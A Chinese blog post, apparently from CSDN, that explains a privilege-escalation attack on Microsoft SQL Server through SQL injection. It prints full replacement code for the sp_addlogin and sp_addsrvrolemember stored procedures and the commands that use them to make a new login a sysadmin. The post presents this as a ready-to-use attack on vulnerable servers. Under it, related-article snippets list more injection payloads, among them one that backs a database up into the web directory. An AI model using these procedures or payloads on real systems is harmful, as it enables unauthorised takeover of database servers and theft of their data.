msSQL注入通杀,只要有注入点就有系统权限

最新推荐文章于 2024-02-05 17:30:55 发布
最新推荐文章于 2024-02-05 17:30:55 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: encryption null sql ie 服务器 go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinawn/article/details/483985
版权
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp_addlogin
    @loginame  sysname
   ,@passwd         sysname = Null
   ,@defdb          ; ; sysname = ’master’      -- UNDONE: DEFAULT 
CONFIGURABLE???
   ,@deflanguage    sysname = Null
   ,@sid   varbinary(16) = Null
   ,@encryptopt  varchar(20) = Null
AS
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
 set nocount on
 Declare @ret    int    -- return value of sp call
    
    -- DISALLOW USER TRANSACTION --
 set implicit_transactions off
 IF (@@trancount 〉 0)
 begin
  raiserror(15002,-1,-1,’sp_addlogin’)
  return (1)
 end
    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT users only)
    --  (3) Not a reserved login name
 execute @ret = sp_validname @loginame
 if (@ret 〈〉 0)
        return (1)
    if (charindex(’/’, @loginame) 〉 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
 --Note: different case sa is allowed.
 if (@loginame = ’sa’ or lower(@loginame) in (’public’))
 begin
  raiserror(15405, -1 ,-1, @loginame)
  return (1)
 end
    -- LOGIN NAME MUST NOT ALREADY EXIST --
 if exists(select * from master.dbo.syslogins where loginname = 
@loginame)
 begin
  raiserror(15025,-1,-1,@loginame)
  return (1)
 end
 -- VALIDATE DEFAULT DATABASE --
 IF db_id(@defdb) IS NULL
 begin
  raiserror(15010,-1,-1,@defdb)
     return (1)
 end
 -- VALIDATE DEFAULT LANGUAGE --
 IF (@deflanguage IS NOT Null)
 begin
  Execute @ret = sp_validlang @deflanguage
  IF (@ret 〈〉 0)
   return (1)
 end
 ELSE
 begin
  select @deflanguage = name from master.dbo.syslanguages
  where langid = @@default_langid --server default 
language
  if @deflanguage is null
   select @deflanguage = N’us_english’
 end
 -- VALIDATE SID IF GIVEN --
 if ((@sid IS NOT Null) and (datalength(@sid) 〈〉 16))
 begin
  raiserror(15419,-1,-1)
   return (1)
 end
 else if @sid is null
  select @sid = newid()
 if (suser_sname(@sid) IS NOT Null)
 begin
  raiserror(15433,-1,-1)
   return (1)
 end
 -- VALIDATE AND USE ENCRYPTION OPTION --
 declare @xstatus smallint
 select @xstatus = 2 -- access
 if @encryptopt is null
  select @passwd = pwdencrypt(@passwd)
 else if @encryptopt = ’skip_encryption_old’
 begin
  select @xstatus = @xstatus | 0x800, -- old-style 
encryption
   @passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
 end
 else if @encryptopt 〈〉 ’skip_encryption’
 begin
  raiserror(15600,-1,-1,’sp_addlogin’)
  return 1
 end
    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
 INSERT INTO master.dbo.sysxlogins VALUES
        (NULL, @sid, @xstatus, getdate(),
             getdate(), @loginame, convert(varbinary(256), @passwd),
             db_id(@defdb), @deflanguage)
 if @@error 〈〉 0  -- this indicates we saw duplicate row
        return (1)
 -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 
SYSLOGINS CHANGE --
 exec(’use master grant all to null’)
    -- FINALIZATION: RETURN SUCCESS/FAILURE --
 raiserror(15298,-1,-1)
 return  (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq

再drop procedure sp_addsrvrolemember,然后在IE里输入


create procedure sp_addsrvrolemember
    @loginame sysname,   -- login name
    @rolename sysname = NULL -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
 set nocount on
 declare @ret        int,    -- return value of sp call
             @rolebit    smallint,
             @ismem      int
    -- DISALLOW USER TRANSACTION --
 set implicit_transactions off
 IF (@@trancount 〉 0)
 begin
  raiserror(15002,-1,-1,’sp_addsrvrolemember’)
  return (1)
 end
    
    -- CANNOT CHANGE SA ROLES --
    if @loginame = ’sa’
    begin
        raiserror(15405, -1 ,-1, @loginame)
        return (1)
    end
    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = CASE @rolename
             WHEN ’sysadmin’         THEN 16
             WHEN ’securityadmin’    THEN 32
             WHEN ’serveradmin’      THEN 64
             WHEN ’setupadmin’       THEN 128
             WHEN ’processadmin’     THEN 256
             WHEN ’diskadmin’        THEN 512
             WHEN ’dbcreator’        THEN 1024
   WHEN ’bulkadmin’  THEN 4096
             ELSE NULL END
    -- ADD ROW FOR NT LOGIN IF NEEDED --
 if not exists(select * from master.dbo.syslogins where 
loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret 〈〉 0)
     begin
      raiserror(15007,-1,-1,@loginame)
      return (1)
     end
    end
    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, 
xdate2 = getdate()
     where name = @loginame and srvid IS NULL
 -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 
SYSLOGINS CHANGE --
 exec(’use master grant all to null’)
 raiserror(15488,-1,-1,@loginame,@rolename)
    -- FINALIZATION: RETURN SUCCESS/FAILURE
 return (@@error) -- sp_addsrvrolemember
GO

接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了,用SQL连接器连接上就OK了。很爽吧。不过在实践过程中发现用NB的SQL命令执行时会提示发送错误,可能是代码太长了的缘故,用IE又不方便,希望哪位能发个执行SQL语句的工具来方便大家。OK,到此结束
chinawn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入Mssql注入
qq_57307348的博客
02-16 5437
sql注入mssql注入基础
MSSQL数据库注入(一)
hhhshd的博客
11-17 5340
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2022
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
SQL注入(Access、Mssql)
jxy158212的博客
01-03 1181
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
MSSQL注入
AliceNo的博客
12-01 1530
SQL注入攻击的目标是过向应用程序的输入中注入恶意的SQL代码,以绕过应用程序的身份验证和访问数据库的安全措施。为了防范MSSQL注入和其他SQL注入攻击,开发人员应该使用参数化查询或预处理语句,以确保用户输入不会直接嵌入到SQL语句中。此外,进行适当的输入验证和过滤也是关键的安全措施。理解MSSQL注入是学习网络安全的一部分,前提是您在合法、授权的环境中进行,用于了解如何保护您的应用程序免受此类攻击。在一些情况下,攻击者可以过在一个查询中嵌套另一个查询来执行更复杂的数据库操作,比如删除表。
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+MYSQL 注入靶场
最新发布
04-26
SQL注入常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入点至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何过`LIMIT`和`ORDER BY`来...
mysql注入-sqlilabs靶场注入
10-15
过实际操作,你将学会如何识别注入点,构造合适的payload,以及使用各种工具(如Burp Suite、Sqlmap等)自动化注入过程。 总的来说,这个PDF文档会详尽地解释SQL注入的各个方面,包括概念、技术、实战和防御措施...
MySQL解决SQL注入的另类方法详解
09-10
在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
SQL Injection with MySQL 注入分析
09-14
实际上,只要能构造出不受引号限制的SQL语句,就有可能实现注入。例如,可以过`UNION`操作结合多个查询,或者利用`OR`、`AND`等逻辑运算符构造条件,以达到执行非法SQL的目的。 在案例中,当变量$id为`1' and 1=2...
什么是DBO
weixin_30902251的博客
05-31 389
DBO是每个数据库的默认用户,具有所有者权限,即DbOwner过用DBO作为所有者来定义对象,能够使数据库中的任何用户引用而不必提供所有者名称。比如:你以User1登录进去并建表Table,而未指定DBO,当用户User2登进去想访问Table时就得知道这个Table是你User1建立的,要写上User1.Table,如果他不知道是你建的,则访问会有问题。如果你建表时把所有者指给了Dbo,则别的...
sql server dbowner 权限 实战
安全界的彭于晏的博客
06-28 1916
具有dbowner角色的用户,能够对数据库执行所有配置和维护操作。例如创建和删除表、存储过程、视图、函数,甚至删除数据库,还可以给其他用户设置权限。 只有增、删、改权限的用户只限于添加、删除和修改记录,其它操作都会受到限制。 第一步 查看当前网站是否为db_owner 权限 and 1=(select is_member(‘db_owner’) );-- 判断当前数据库用户是否为db_owner 权限 第二步:找出网站路径 1.过报错或baidu google 等查找 过搜索引擎收录报错的页面看看里
SQL注入漏洞(MSSQL注入
errorr0
07-05 2392
MSSQL注入的入门讲解
Docker安装Mongo并设置用户名密码
m0_46205920的博客
05-14 1962
命令 docker run -itd --name mongo --restart=on-failure:10 -p 27017:27017 -v /home/db mongo --auth –restart=on-failure:10:为mongo添加重启策略,在非零状态下退出,重试次数设置为10次 -p 27017:27017:映射容器服务的 27017 端口到宿主机的 27017 端口。外部可以直接过 宿主机 ip:27017 访问到 mongo 的服务。 –auth:需要密码才能访问容器服务
个人MSSQL总结及收集
qq_36334672的博客
02-05 949
*Sysobjects表: **SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、 默认值、日志、规则、存储过程等,每个对象在表中占一行。**Name, id, xtype, uid, status: **分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
【数据库】MSSQL 注入入门级的讲解
wjianwei666的专栏
12-02 706
MSSQL 注入的原理是利用应用程序中的 SQL 语句漏洞,将恶意 SQL 代码插入到正常的 SQL 语句中。(1)使用预编译的 SQL 语句:过使用预编译的 SQL 语句,可以减少应用程序中的 SQL 语句漏洞。(1)SQL 注入扫描器:如 OWASP ZAP、Burp Suite 等,这些工具可以模拟 SQL 注入攻击,帮助开发者发现应用程序中的 SQL 注入漏洞。3. 提高应用程序的安全性:使用安全编程规范,避免使用容易受到 SQL 注入攻击的语句,如拼接 SQL 语句、使用动态 SQL 等。
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2705
DNS注入 DNS注入原理 过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
MSSQL注入的入门讲解
欢迎来到软件测试jeffky博客!在这里,我们将探讨各种与软件测试相关的主题,包括测试策略、方法、工具、最佳实践和行业趋势。我们的目标是帮助读者提高软件质量,确保用户满意度,并分享在软件测试领域的知识和经验。
12-04 105
MSSQL注入是一种网络安全漏洞,其方法是攻击者在Web应用程序的输入框中插入恶意的SQL代码,进而篡改原始的SQL查询语句,以实现攻击者的目标。例如,攻击者可能会试图获取数据库中的敏感信息或执行一些未经授权的操作。
详细MSSQL注入语句
收集盒 Book box
09-15 1623
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@versi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值